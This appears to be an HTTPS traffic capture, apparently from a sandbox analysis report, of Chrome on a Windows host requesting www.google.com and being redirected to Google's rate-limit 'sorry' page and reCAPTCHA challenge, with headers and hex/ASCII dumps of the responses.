                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.549717142.250.81.2284437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:05 UTC846OUTGET / HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                                                                                                                            2024-02-20 22:46:06 UTC1845INHTTP/1.1 302 Found
                                                                                                                                                            Location: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                            x-hallmonitor-challenge: CgsIrtfUrgYQ66GnBhIEv2Dj3g
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7_cTz1W0AuL35hSwT6eCgg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:06 GMT
                                                                                                                                                            Server: gws
                                                                                                                                                            Content-Length: 398
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Set-Cookie: 1P_JAR=2024-02-20-22; expires=Thu, 21-Mar-2024 22:46:06 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                                            Set-Cookie: AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ; expires=Sun, 18-Aug-2024 22:46:06 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2024-02-20 22:46:06 UTC398INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 26 61 6d 70 3b 71 3d 45 67 53 5f 59 4f 50 65 47 4b 33 58 31
                                                                                                                                                            Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/&amp;q=EgS_YOPeGK3X1


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.549718142.250.81.2284437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:06 UTC1106OUTGET /sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
                                                                                                                                                            2024-02-20 22:46:06 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:06 GMT
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Server: HTTP server (unknown)
                                                                                                                                                            Content-Length: 3056
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2024-02-20 22:46:06 UTC896INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/</title></head><body style="font
                                                                                                                                                            2024-02-20 22:46:06 UTC1252INData Raw: 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 6c 57 51 69 38 58 46 59 4a 48 4c 46 42 53 6f 55 35 53 69 44 38 44 72 65 4c 4d 62 4c 71 79 61 4d 57 49 4c 55 70 35 4b 43 7a 31 46 33 35 7a 57 6f 6d
                                                                                                                                                            Data Ascii: esponse) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWom
                                                                                                                                                            2024-02-20 22:46:06 UTC908INData Raw: 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e 67 20 74 68 65 20 61 62 6f 76 65 20 43 41 50 54 43 48 41 20 77 69 6c 6c 20 6c 65 74 20 79 6f 75
                                                                                                                                                            Data Ascii: sts coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solving the above CAPTCHA will let you


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.549720142.250.81.2284437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:06 UTC1123OUTGET /recaptcha/api.js HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                            Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
                                                                                                                                                            2024-02-20 22:46:06 UTC528INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                            Expires: Tue, 20 Feb 2024 22:46:06 GMT
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:06 GMT
                                                                                                                                                            Cache-Control: private, max-age=300
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2024-02-20 22:46:06 UTC724INData Raw: 34 63 36 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                            Data Ascii: 4c6/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                            2024-02-20 22:46:06 UTC505INData Raw: 6d 56 34 63 47 6c 79 65 53 49 36 4d 54 63 79 4e 54 51 77 4e 7a 6b 35 4f 53 77 69 61 58 4e 54 64 57 4a 6b 62 32 31 68 61 57 34 69 4f 6e 52 79 64 57 55 73 49 6d 6c 7a 56 47 68 70 63 6d 52 51 59 58 4a 30 65 53 49 36 64 48 4a 31 5a 58 30 3d 27 3b 64 2e 68 65 61 64 2e 70 72 65 70 65 6e 64 28 6d 29 3b 70 6f 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 3b 70 6f 2e 63 72 6f 73 73 4f 72 69 67 69 6e 3d 27 61 6e 6f 6e 79 6d 6f 75 73 27 3b 70 6f 2e 69 6e 74 65 67 72 69 74 79 3d 27 73 68 61 33 38 34 2d 37 2b 49 52 4c 78 6b 6c 31 7a 36 71 72 2f
                                                                                                                                                            Data Ascii: mV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';d.head.prepend(m);po.src='https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js';po.crossOrigin='anonymous';po.integrity='sha384-7+IRLxkl1z6qr/
                                                                                                                                                            2024-02-20 22:46:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.549723142.250.81.2284437832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-02-20 22:46:08 UTC1730OUTGET /recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=lWQi8XFYJHLFBSoU5SiD8DreLMbLqyaMWILUp5KCz1F35zWomRvT9ZsLyU2pNy3cJT6ktzRP5y17XcMG-do_3Wz9iewnxFuXO9-Rn8pvEh73KR_ICtSbe2Z6e_Ei5_nwQyOLl8qvlYvQk4daw9H_NvC1gU1QG5NpYFKB5attDgP678B_k9rlXBPBo2eoAqVFlZ1Em14eX_80yS-dPAqW96lMh_xfWdLzYUhZtjmAdlCguJrDRQwMm7Rczgjwz-ZdX4GSGDCvHFQ8Zn5X9oOgweVqfE-fbaY&cb=yulbx0ey1rif HTTP/1.1
                                                                                                                                                            Host: www.google.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                            X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                            Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGK3X1K4GIjCs5bmnU-QRgcCxGGYio4gxMIxzCz8oSx53B1g933onepuWbALDDhFc9jBNVv2Q5b8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-20-22; AEC=Ae3NU9O2Tzbo8GWfOKc6eZ1KT0vjCbDQUmWoxnBNZoofkrmSndokMcZywQ
                                                                                                                                                            2024-02-20 22:46:08 UTC891INHTTP/1.1 200 OK
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                            Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                            Date: Tue, 20 Feb 2024 22:46:08 GMT
                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-87hE8ILMPb8ew5caAgNIcw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            Server: GSE
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Connection: close
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            2024-02-20 22:46:08 UTC361INData Raw: 32 61 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b
                                                                                                                                                            Data Ascii: 2ab4<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face {
                                                                                                                                                            2024-02-20 22:46:08 UTC1252INData Raw: 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66
                                                                                                                                                            Data Ascii: o/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//f
                                                                                                                                                            2024-02-20 22:46:08 UTC1252INData Raw: 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20
                                                                                                                                                            Data Ascii: 9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329,
